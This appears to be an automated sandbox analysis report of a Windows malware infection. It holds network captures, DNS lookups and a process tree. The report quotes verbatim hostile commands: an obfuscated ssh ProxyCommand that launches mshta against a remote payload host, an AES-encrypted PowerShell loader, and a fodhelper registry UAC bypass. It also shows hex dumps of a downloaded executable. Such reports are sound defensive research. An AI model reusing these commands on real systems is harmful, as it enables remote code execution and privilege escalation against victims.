                                                        Dec 27, 2024 08:51:34.743192911 CET50087443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:34.743232012 CET44350087206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:34.743401051 CET50087443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:34.805285931 CET50087443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:34.805285931 CET50087443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:34.805318117 CET44350087206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:34.805330992 CET44350087206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:34.805408001 CET44350087206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:37.337166071 CET50088443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:37.337214947 CET4435008894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:37.337287903 CET50088443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:37.435509920 CET50088443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:37.435543060 CET4435008894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:37.435617924 CET4435008894.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:39.681526899 CET50089443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:39.681566954 CET44350089188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:39.681641102 CET50089443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:39.750240088 CET50089443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:39.750266075 CET44350089188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:39.750330925 CET50089443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:39.750339031 CET44350089188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:39.750375986 CET44350089188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.154323101 CET50090443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.154371977 CET44350090188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.154449940 CET50090443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.222393036 CET50090443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.222413063 CET44350090188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.222466946 CET44350090188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.222558975 CET50090443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.222577095 CET44350090188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.223391056 CET50091443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:49.223439932 CET44350091206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:49.223529100 CET50091443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:49.274930954 CET50091443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:51:49.274965048 CET44350091206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:49.275033951 CET44350091206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:51:49.277067900 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.277103901 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.277493000 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.324517965 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.324556112 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.324628115 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.328797102 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.328846931 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.328953028 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380084991 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380115032 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.380177021 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.380213022 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380234003 CET44350093188.132.183.159192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:47:37.040374994 CET | 64731 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 08:47:37.552735090 CET | 53 | 64731 | 1.1.1.1 | 192.168.2.10
Dec 27, 2024 08:47:59.766514063 CET | 60924 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 08:48:14.492652893 CET | 61676 | 53 | 192.168.2.10 | 1.1.1.1
Dec 27, 2024 08:48:38.616292000 CET | 60946 | 53 | 192.168.2.10 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:47:37.040374994 CET | 192.168.2.10 | 1.1.1.1 | 0xbebe | Standard query (0) | pravo-bashkortostan.ru | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:59.766514063 CET | 192.168.2.10 | 1.1.1.1 | 0x6224 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:48:14.492652893 CET | 192.168.2.10 | 1.1.1.1 | 0x671a | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:48:38.616292000 CET | 192.168.2.10 | 1.1.1.1 | 0x6825 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:47:37.552735090 CET | 1.1.1.1 | 192.168.2.10 | 0xbebe | No error (0) | pravo-bashkortostan.ru |  | 150.241.97.10 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:55.129160881 CET | 1.1.1.1 | 192.168.2.10 | 0xa7c | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:55.129160881 CET | 1.1.1.1 | 192.168.2.10 | 0xa7c | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:59.992306948 CET | 1.1.1.1 | 192.168.2.10 | 0x6224 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 08:48:14.630804062 CET | 1.1.1.1 | 192.168.2.10 | 0x671a | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 08:48:38.847888947 CET | 1.1.1.1 | 192.168.2.10 | 0x6825 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 08:49:14.888700008 CET | 1.1.1.1 | 192.168.2.10 | 0x55fe | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:49:14.888700008 CET | 1.1.1.1 | 192.168.2.10 | 0x55fe | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:49:38.942039013 CET | 1.1.1.1 | 192.168.2.10 | 0xf971 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:49:38.942039013 CET | 1.1.1.1 | 192.168.2.10 | 0xf971 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                        • pravo-bashkortostan.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 150.241.97.10 | 443 | 7936 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:47:39 UTC | 333 | OUT | GET /aaa.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pravo-bashkortostan.ru
Connection: Keep-Alive
2024-12-27 07:47:39 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:47:39 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 24 Dec 2024 02:55:06 GMT
ETag: "796cb-629fb3d863680"
Accept-Ranges: bytes
Content-Length: 497355
Connection: close
Content-Type: video/mp4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49728 | 150.241.97.10 | 443 | 180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:47:46 UTC | 79 | OUT | GET /ggg.pdf HTTP/1.1
Host: pravo-bashkortostan.ru
Connection: Keep-Alive
2024-12-27 07:47:46 UTC | 261 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:47:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 24 Dec 2024 02:51:24 GMT
ETag: "1491ab-629fb304ac300"
Accept-Ranges: bytes
Content-Length: 1348011
Connection: close
Content-Type: application/pdf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49741 | 150.241.97.10 | 443 | 180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:47:50 UTC | 56 | OUT | GET /mama.exe HTTP/1.1
Host: pravo-bashkortostan.ru
2024-12-27 07:47:51 UTC | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:47:51 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 23 Dec 2024 10:31:56 GMT
ETag: "414400-629ed81723f00"
Accept-Ranges: bytes
Content-Length: 4277248
Connection: close
Content-Type: application/x-msdos-program
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 68 d1 e6 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 86 fa ff ff 89 45 ec 83 7d ec 00 75 1f 8b 45 fc 8b d3 e8 ff fb ff ff 8b d8 8b 45 fc 8d 04 b0 8b cb 8b 55 f0 e8 a1 f9 ff ff 89 5d ec 33 c0 5a 59 59 64 89 10 68 d8 e6 40 00 8b 45 f4 8d 04 40 8b 55 fc 8d 04 82 e8 6c fb ff ff c3 e9 5e ab ff ff eb e7 8b 45 ec 89 45 e8 8b 45 e8 8d 90 84 00 00 00 8b 45 e8 8b 4d f8 e8 9a f7 ff ff 5e 5b 8b e5 5d c3 55 8b ec 83 c4 e8 53 56 8b d9 89 55 f8 89 45 fc 8b 45 fc 80 b8 48 09 00 00 00 0f 84 8f 00 00 00 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 04 b0 e8 94 fa ff ff 33 d2 55 68 80 e7 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 b2 f9 ff ff 89 45 ec 33 c0 5a 59 59 64 89 10 68 87 e7 40 00
                                                        Data Ascii: h@d2d"EME}uEEU]3ZYYdh@E@Ul^EEEEM^[]USVUEEHUu4vE3Uh@d2d"EME3ZYYdh@
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 8d 7d a8 89 55 e8 56 be 5c fc 7e 00 b9 09 00 00 00 f3 a5 5e 89 75 ac 8b 45 0c 89 45 b0 8b 55 d0 89 55 b4 f6 45 cc 01 75 28 8b 0d 80 fc 7e 00 89 4d fc 8d 45 a8 89 45 fc 8d 55 fc 52 6a 01 6a 00 68 57 00 6d c0 e8 1b f9 ff ff 33 c0 e9 10 02 00 00 8b 55 d4 8b 45 0c 2b 45 d8 85 c0 8b 1a 79 03 83 c0 03 c1 f8 02 89 45 f8 8b 45 f8 8b f8 c1 e7 02 03 7d dc f6 47 03 80 0f 94 c0 83 e0 01 89 45 b8 85 c0 74 11 8b 17 52 e8 f0 03 00 00 59 83 c0 02 89 45 bc eb 0b 8b 0f 81 e1 ff ff 00 00 89 4d bc 33 ff 83 3d 34 a6 7f 00 00 74 17 8d 45 a8 50 6a 00 ff 15 34 a6 7f 00 8b f8 85 ff 74 05 e9 7c 01 00 00 85 db 0f 85 bc 00 00 00 83 3d 34 a6 7f 00 00 74 0e 8d 45 a8 50 6a 01 ff 15 34 a6 7f 00 8b d8 85 db 75 0b 8b 45 b4 50 e8 6e f8 ff ff 8b d8 85 db 75 4b e8 5b f8 ff ff 89 45 c8 83 3d
                                                        Data Ascii: }UV\~^uEEUUEu(~MEEURjjhWm3UE+EyEE}GEtRYEM3=4tEPj4t|=4tEPj4uEPnuK[E=
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 41 00 8b 03 50 e8 d7 f7 ff ff a3 60 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 c5 f7 ff ff a3 64 a6 7f 00 68 18 27 41 00 8b 03 50 e8 b3 f7 ff ff a3 68 a6 7f 00 68 40 27 41 00 8b 03 50 e8 a1 f7 ff ff a3 6c a6 7f 00 68 c4 26 41 00 8b 03 50 e8 8f f7 ff ff a3 70 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 7d f7 ff ff a3 74 a6 7f 00 68 6c 27 41 00 8b 03 50 e8 6b f7 ff ff a3 78 a6 7f 00 68 98 27 41 00 8b 03 50 e8 59 f7 ff ff a3 7c a6 7f 00 68 b8 27 41 00 8b 03 50 e8 47 f7 ff ff a3 80 a6 7f 00 68 d8 27 41 00 8b 03 50 e8 35 f7 ff ff a3 84 a6 7f 00 68 10 28 41 00 8b 03 50 e8 23 f7 ff ff a3 88 a6 7f 00 68 38 28 41 00 8b 03 50 e8 11 f7 ff ff a3 8c a6 7f 00 68 6c 28 41 00 8b 03 50 e8 ff f6 ff ff a3 90 a6 7f 00 68 a0 28 41 00 8b 03 50 e8 ed f6 ff ff a3 94 a6 7f 00 68 c8 28 41 00 8b
                                                        Data Ascii: AP`h&APdh'APhh@'APlh&APph&AP}thl'APkxh'APY|h'APGh'AP5h(AP#h8(APhl(APh(APh(A


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
                                                        Imagebase:0x7ff726840000
                                                        File size:946'176 bytes
                                                        MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:02:47:34
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:02:47:34
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4
                                                        Imagebase:0x7ff7ec3c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:02:47:38
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:02:47:39
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('[hex-encoded ciphertext omitted]');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283)
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:02:47:39
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:02:47:40
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\fodhelper.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:FoDHelper.exe
                                                        Imagebase:0x7ff77fca0000
                                                        File size:49'664 bytes
                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -w 1 -ep Unrestricted -nop
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:24
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:25
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:02:47:48
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
                                                        Imagebase:0x7ff64eb90000
                                                        File size:5'641'176 bytes
                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:30
                                                        Start time:02:47:49
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                        Imagebase:0x7ff63ec50000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:32
                                                        Start time:02:47:49
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                        Imagebase:0x7ff63ec50000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:35
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
